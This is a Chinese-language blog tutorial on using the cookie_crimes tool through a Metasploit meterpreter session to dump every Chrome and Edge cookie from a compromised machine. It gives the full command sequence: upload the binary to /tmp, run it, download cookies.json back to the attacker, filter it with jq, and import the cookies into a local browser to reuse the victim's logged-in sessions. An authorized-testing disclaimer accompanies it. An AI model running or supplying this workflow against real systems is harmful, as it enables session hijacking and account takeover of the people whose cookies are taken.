Metasploit 集成教程:如何在 meterpreter 会话中使用 cookie_crimes 提取 Cookies

发布时间:2026/10/10 13:05:29

Metasploit 集成教程:如何在 meterpreter 会话中使用 cookie_crimes 提取 Cookies Metasploit 集成教程如何在 meterpreter 会话中使用 cookie_crimes 提取 Cookies【免费下载链接】cookie_crimesRead local Chrome cookies without root or decrypting项目地址: https://gitcode.com/gh_mirrors/co/cookie_crimes写在前面什么是 cookie_crimescookie_crimes是一款开源的 Chrome Cookie 提取工具它的核心卖点是无需 root 权限、无需用户密码、无需解密就能把目标机器上 Chrome甚至 Edge浏览器的全部 Cookies 以整洁的 JSON 格式导出。在Metasploit渗透测试流程中当你拿到一个meterpreter 会话后把 cookie_crimes 上传到目标机器运行即可快速提取目标用户的登录态 Cookie为后续测试提供关键突破口。本教程将带你一步步完成Metasploit 与 cookie_crimes 的集成并演示如何在 meterpreter 会话中提取 Cookies。⚠️ 安全声明本文内容仅限授权测试渗透测试、CTF、应急响应、自有设备。未经授权使用属于违法行为请勿用于非法用途。cookie_crimes 的核心功能一览在动手集成之前先快速了解这个工具能做什么功能特性说明 免权限提取不需要 root、不需要用户密码也不需要解密 Cookies 数据库 跨平台支持覆盖 Windows、Linux、macOS 三大系统 多浏览器兼容支持 Chrome也支持基于 Chromium 的 Microsoft Edge JSON 输出输出格式与 EditThisCookie 扩展兼容可直接导入 任意 Profile可通过修改配置提取任意 Chrome 用户资料目录的 Cookies 单文件编译可编译成独立二进制方便在目标机器上执行核心原理很简单cookie_crimes 启动一个带--headless和--remote-debugging-port9222参数的 Chrome 实例并指向目标的用户数据目录然后通过 WebSocket 调用 Chrome DevTools 协议的Network.getAllCookies接口把 Cookies 一次性拉取出来。整个逻辑都在主脚本 cookie_crimes.py 中。Metasploit 集成前置准备在开始集成前请确认满足以下条件本地环境Python 3.6用于编译二进制Metasploit已安装且已建立目标机器的 meterpreter 会话目标机器安装有 Chrome 或 Edge且会话权限能执行命令。第一步获取 cookie_crimes 源码在本地与目标同系统的机器克隆项目git clone https://gitcode.com/gh_mirrors/co/cookie_crimes cd cookie_crimes第二步编译单文件二进制推荐直接把 Python 脚本上传到目标机器也能运行但目标机器未必有 Python 环境。更稳妥的做法是编译成单文件二进制这也是官方推荐的用法。项目自带的 Makefile 封装了编译命令pip3 install -r requirements.txt makemake实际执行的是pyinstaller -F cookie_crimes.py编译产物会生成在dist/目录下。 注意该项目不支持交叉编译在哪个系统上编译产物就只能跑在哪个系统上。请务必在与你目标机器相同的操作系统上完成编译。第三步在 meterpreter 会话中上传二进制拿到 meterpreter 会话后把编译好的二进制上传到目标机器的临时目录meterpreter upload /path/to/dist/cookie_crimes /tmp/cookie_crimes meterpreter shell如果上传后没有执行权限在 shell 中补一个chmod x即可。第四步在 meterpreter 会话中执行并提取 Cookies进入目标的 shell 后直接运行二进制将输出重定向到文件cd /tmp ./cookie_crimes cookies.json工具会自动完成启动 headless Chrome → 连接远程调试端口 → 调用协议拉取 Cookies → 清理进程的完整流程。几秒钟后cookies.json中就保存了目标浏览器全部站点的 Cookies而且是纯文本形式直接可读。第五步回传并解析 Cookies把结果下载回本地进行分析meterpreter download /tmp/cookies.json然后本地用jq快速过滤出你关心的站点cat cookies.json | jq .[] | select(.domain | contains(example.com))如果想把 Cookies 导入本地 Chrome 浏览器配合 EditThisCookie 扩展复现登录态可以用项目附带的格式化脚本 format_for_editthiscookie.sh 去掉域名开头的点号cat cookies.json | ./format_for_editthiscookie.sh进阶技巧提取指定 Chrome Profile 的 Cookies默认情况下 cookie_crimes 提取的是 Default 资料目录。如果目标用户在 Chrome 中创建了多个 Profile例如 Profile 1只需修改 cookie_crimes.py 顶部的PROFILE_NAME变量再重新编译即可PROFILE_NAME Profile 1工具会通过复制用户资料目录到/tmp的巧妙方式让 Chrome 误以为该目录就是默认资料从而读出对应 Profile 的 Cookies。常见问题排查提取结果为空目标 Chrome 可能正在运行导致用户数据目录被占用可先在目标机器上结束 Chrome 进程再执行macOS 上偶发失败由于 Chrome 更新频繁--headless方式在 macOS 上时好时坏。此时可改用项目附带的 cookie_crimes_macos.sh 脚本它会重启 Chrome 并附加远程调试来读取 Cookies目标没有 Python这正是先编译单文件二进制再上传的原因二进制不依赖目标机器的 Python 环境。总结通过 Metasploit 的 meterpreter 会话集成 cookie_crimes你可以在无需 root、无需密码的情况下快速拿到目标浏览器的完整 Cookie 数据。整个过程只需四步获取源码 → 编译二进制 → 上传执行 → 回传解析。它尤其适合在授权渗透测试中快速评估目标账号的安全状况。记住技术本身是中立的请务必只在授权范围内使用 cookie_crimes做一个守法的安全研究者。️【免费下载链接】cookie_crimesRead local Chrome cookies without root or decrypting项目地址: https://gitcode.com/gh_mirrors/co/cookie_crimes创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
延伸阅读

更多相关文章

2026/10/7 5:37:08

请解释一下PHP中的垃圾回收机制。

首先,我们要明白什么是“垃圾”。在这里,“垃圾”指的是程序中不再需要使用的数据。这些数据占用了计算机的内存空间,但是如果我们不去清理它们,它们就会一直待在那里,浪费宝贵的内存资源。那么,PHP中的垃圾…

2026/10/6 19:08:29

小米twrp

驱动解锁 申请解锁小米手机 http://miuirom.xiaomi.com/rom/u1106245679/7.6.727.43/miflash_unlock_7.6.727.43.zip twrp下载 https://twrp.me/xiaomi/ adb下载 https://dl.google.com/android/repository/platform-tools_r34.0.5-windows.zip On your device, go into …

2026/10/10 13:02:26

鸿蒙跨设备剪贴板开发:从PasteData到分布式KV的完整实践

手机复制地址,平板那边马上能粘贴;电脑上复制一段代码,手机顺手就能贴进备忘录。这是我接触鸿蒙跨设备剪贴板之后,最直观也最上头的体验。刚开始我并不觉得这算什么大功能,直到自己动手写了一个跨设备剪贴板的小工具&a…

2026/10/10 13:02:26

epoll原理与高并发实战:从C10K到百万连接的I/O多路复用核心

1. 为什么“epoll”这个词总在深夜的服务器日志里闪现你有没有过这样的经历:凌晨两点,线上服务突然响应变慢,监控曲线像心电图一样剧烈抖动。运维同事甩来一条命令行截图——strace -p $(pgrep -f server) | grep epoll,后面跟着一…

2026/10/10 13:02:26

路由器故障排查全指南:从硬件到软故障的实战手册

简介:这份文档资料聚焦计算机网络中路由器的常见故障与处理思路,面向网络运维初学者、计算机专业学生以及需要排查家庭或小型办公网络问题的技术人员。内容从路由器的硬件组成讲起,涵盖处理器、DRAM、BootROM、NVRAM、Flash及系统软件等核心部…

2026/10/10 13:02:26

复现BOA改进三件套:Circle混沌初始化、非线性因子与正余弦融合

1. 为什么我决定复现这个“三件套”改进蝴蝶优化算法(BOA)在群体智能算法里不算冷门,它靠“气味浓度”来引导个体位置更新的机制很特别,代码写起来也比粒子群简单。但这两年我陆陆续续看了不少BOA改进文章,发现一个普遍…

2026/10/10 12:57:22

深度学习十年演进:从卷积网络到Transformer的工程实践复盘

2012年我刚入行的时候,谁要是在组会上说“咱们把图像识别的特征工程全扔掉,让网络自己学”,大概率会被当成刚看完科幻电影的热血青年。但十年之后,当年那套“让网络自己学”的思路已经把整个行业从头到脚换了一遍。我也是在那几年…

2026/10/10 7:31:36

Jev+Agent接管浏览器:browser-use实战与jev-ultrafast性能优化

1. 从“Jev”说起:为什么我要把Agent接进浏览器“Jev”这个词最近在圈子里出现的频率越来越高,很多人第一次听到会以为是某个新模型的名字,其实它更像是一种思路——把Jev模型的能力当作底座,通过Agent的方式去接管浏览器&#xf…

2026/10/9 20:15:56

多智能体集群实战:DeepAgents编排、MCP与A2A协议及Skills体系

1. 从"单兵作战"到"集群协同":多智能体编排到底在解决什么问题如果你最近在折腾 Agent 相关的东西,大概率会有一种感觉:单个 Agent 能做的事情,其实很快就摸到天花板了。你给它一个提示词,挂几个工…

2026/10/8 6:05:44

无源低通滤波器设计实战:从RC到LC,手把手教你避开那些坑

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/10 0:04:53

从逻辑门到计算机:数字电路核心原理与全加器搭建实战

如果你拆过一台旧电脑的主板,盯着那些黑乎乎的小芯片看上一会儿,可能会冒出同一个疑问:这堆引脚密集的元件,到底是怎么“变”出那么复杂的应用的?答案并不在某个神秘的部件里,而是在所有芯片内部都在反复使…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
☎咨询二维码 ☎ ↑